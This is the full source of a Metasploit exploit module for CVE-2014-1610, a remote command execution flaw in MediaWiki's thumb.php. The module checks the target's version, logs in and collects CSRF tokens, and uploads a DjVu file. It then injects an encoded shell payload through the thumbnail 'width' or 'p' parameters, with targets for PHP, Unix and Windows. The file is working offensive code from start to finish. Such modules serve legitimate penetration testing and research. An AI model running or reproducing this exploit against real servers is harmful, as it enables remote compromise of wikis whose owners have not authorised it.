## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'MediaWiki Thumb.php Remote Command Execution', 'Description' => %q{ MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11, when DjVu or PDF file upload support is enabled, allows remote unauthenticated users to execute arbitrary commands via shell metacharacters. If no target file is specified this module will attempt to log in with the provided credentials to upload a file (.DjVu) to use for exploitation. }, 'Author' => [ 'Netanel Rubin', # from Check Point - Discovery 'Brandon Perry', # Metasploit Module 'Ben Harris', # Metasploit Module 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2014-1610' ], [ 'OSVDB', '102630'], [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ], [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ] ], 'Privileged' => false, 'Targets' => [ [ 'Automatic PHP-CLI', { 'Payload' => { 'BadChars' => "\r\n", 'PrependEncoder' => "php -r \"", 'AppendEncoder' => "\"" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP } ], [ 'Linux CMD', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python php', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD } ], [ 'Windows CMD', { 'Payload' => { 'BadChars' => "", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl', } }, 'Platform' => ['win'], 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 28 2014')) register_options( [ OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]), OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]), OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]), OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ]) ], self.class) end def get_version(body) meta_generator = get_html_value(body, 'meta', 'generator', 'content') unless meta_generator vprint_status("No META Generator tag on #{full_uri}.") return nil, nil, nil end if meta_generator && meta_generator =~ /mediawiki/i vprint_status("#{meta_generator} detected.") meta_generator =~ /(\d)\.(\d+)[\.A-z]+(\d+)/ major = $1.to_i minor = $2.to_i patch = $3.to_i vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}") return major, minor, patch end return nil, nil, nil end def check uri = target_uri.path opts = { 'uri' => normalize_uri(uri, 'index.php') } response = send_request_cgi!(opts) if opts['redirect_uri'] vprint_status("Redirected to #{opts['redirect_uri']}.") end unless response vprint_status("No response from #{full_uri}.") return CheckCode::Unknown end # Mediawiki will give a 404 for unknown pages but still have a body if response.code == 200 || response.code == 404 vprint_status("#{response.code} response received...") major, minor, patch = get_version(response.body) unless major return CheckCode::Unknown end if major == 1 && (minor < 8 || minor > 22) return CheckCode::Safe elsif major == 1 && (minor == 22 && patch > 1) return CheckCode::Safe elsif major == 1 && (minor == 21 && patch > 4) return CheckCode::Safe elsif major == 1 && (minor == 19 && patch > 10) return CheckCode::Safe elsif major == 1 return CheckCode::Appears else return CheckCode::Safe end end vprint_status("Received response code #{response.code} from #{full_uri}") CheckCode::Unknown end def exploit uri = target_uri.path print_status("Grabbing version and login CSRF token...") response = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'title' => 'Special:UserLogin' } }) unless response fail_with(Failure::NotFound, "Failed to retrieve webpage.") end server = response['Server'] if server && target.name =~ /automatic/i && server =~ /win32/i vprint_status("Windows platform detected: #{server}.") my_platform = Msf::Module::Platform::Windows elsif server && target.name =~ /automatic/i vprint_status("Nix platform detected: #{server}.") my_platform = Msf::Module::Platform::Unix else my_platform = target.platform.platforms.first end # If we have already identified a DjVu/PDF file on the server trigger # the exploit unless datastore['FILENAME'].blank? payload_request(uri, datastore['FILENAME'], my_platform) return end username = datastore['USERNAME'] password = datastore['PASSWORD'] major, minor, patch = get_version(response.body) # Upload CSRF added in v1.18.2 # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1 if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1)) upload_csrf = false elsif ((major == 1) && (minor < 18)) upload_csrf = false else upload_csrf = true end session_cookie = response.get_cookies wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value') if wp_login_token.blank? fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?") else print_good("Retrieved login CSRF token.") end print_status("Attempting to login...") login = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'method' => 'POST', 'vars_get' => { 'title' => 'Special:UserLogin', 'action' => 'submitlogin', 'type' => 'login' }, 'cookie' => session_cookie, 'vars_post' => { 'wpName' => username, 'wpPassword' => password, 'wpLoginAttempt' => 'Log in', 'wpLoginToken' => wp_login_token } }) if login and login.code == 302 print_good("Log in successful.") else fail_with(Failure::NoAccess, "Failed to log in.") end auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','') # Testing v1.15.1 it looks like it has session fixation # vulnerability so we dont get a new session cookie after # authenticating. Therefore we need to include our old cookie. unless auth_cookie.include? 'session=' auth_cookie << session_cookie end print_status("Getting upload CSRF token...") if upload_csrf upload_file = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), 'cookie' => auth_cookie }) unless upload_file and upload_file.code == 200 fail_with(Failure::NotFound, "Failed to access file upload page.") end wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value') title = get_html_value(upload_file.body, 'input', 'title', 'value') if upload_csrf && wp_edit_token.blank? fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?") elsif upload_csrf print_good("Retrieved upload CSRF token.") end upload_mime = Rex::MIME::Message.new djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu")) file_name = "#{rand_text_alpha(4)}.djvu" upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"") upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\"wpDestFile\"") upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\"wpUploadDescription\"") upload_mime.add_part("", nil, nil, "form-data; name=\"wpLicense\"") upload_mime.add_part("1",nil,nil, "form-data; name=\"wpIgnoreWarning\"") upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\"wpEditToken\"") if upload_csrf upload_mime.add_part(title, nil, nil, "form-data; name=\"title\"") upload_mime.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"") upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\"wpUpload\"") post_data = upload_mime.to_s print_status("Uploading DjVu file #{file_name}...") upload = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'), 'data' => post_data, 'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}", 'cookie' => auth_cookie }) if upload and upload.code == 302 and upload.headers['Location'] location = upload.headers['Location'] print_good("File uploaded to #{location}") else if upload.body.include? 'not a permitted file type' fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.") else fail_with(Failure::UnexpectedReply, "Failed to upload file.") end end payload_request(uri, file_name, my_platform) end def payload_request(uri, file_name, my_platform) if my_platform == Msf::Module::Platform::Windows trigger = "1)&(#{payload.encoded})&" else trigger = "1;#{payload.encoded};" end vars_get = { 'f' => file_name } if file_name.include? '.pdf' vars_get['width'] = trigger elsif file_name.include? '.djvu' vars_get['width'] = 1 vars_get['p'] = trigger else fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}") end print_status("Sending payload request...") r = send_request_cgi({ 'uri' => normalize_uri(uri, 'thumb.php'), 'vars_get' => vars_get }, 1) if r && r.code == 404 && r.body =~ /not exist/ print_error("File: #{file_name} does not exist.") elsif r print_error("Received response #{r.code}, exploit probably failed.") end end # The order of name, value keeps shifting so regex is painful. # Cant use nokogiri due to security issues # Cant use REXML directly as its not strict XHTML # So we do a filthy mixture of regex and REXML def get_html_value(html, type, name, value) return nil unless html return nil unless type return nil unless name return nil unless value found = nil html.each_line do |line| if line =~ /(<#{type}[^\/]*name="#{name}".*?\/>)/i found = $& break end end if found doc = REXML::Document.new found return doc.root.attributes[value] end '' end end